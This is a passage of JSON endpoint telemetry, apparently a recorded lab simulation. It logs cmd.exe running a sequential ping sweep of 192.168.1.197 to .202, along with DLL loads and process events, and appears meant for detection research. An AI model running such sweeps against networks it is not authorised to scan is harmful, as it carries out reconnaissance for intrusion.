"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947140000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572947290000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572949490000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572949490000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883572949490000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "process", - "pid": 976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572951990000, - "unique_pid": "{42FC7E13-CBAE-5C05-0000-00105A765301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.197", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5012, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572952140000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "event_type": "process", - "pid": 5012, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572956830000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-00102C7A5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.198", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1976, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572956990000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572956980000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "event_type": "process", - "pid": 1976, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572961990000, - "unique_pid": "{42FC7E13-CBAF-5C05-0000-0010B07C5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.199", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7916, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572962140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "event_type": "process", - "pid": 7916, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572966990000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00101F7F5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.200", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8152, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572967140000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "event_type": "process", - "pid": 8152, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572971830000, - "unique_pid": "{42FC7E13-CBB0-5C05-0000-00100C825301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.201", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2768, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572971980000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "event_type": "process", - "pid": 2768, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883572976990000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-001083845301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.202", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6828, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883572977130000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - "unique_pid": "{42FC7E13-CBB1-5C05-0000-0010F2865301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6828, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883572977140000, - 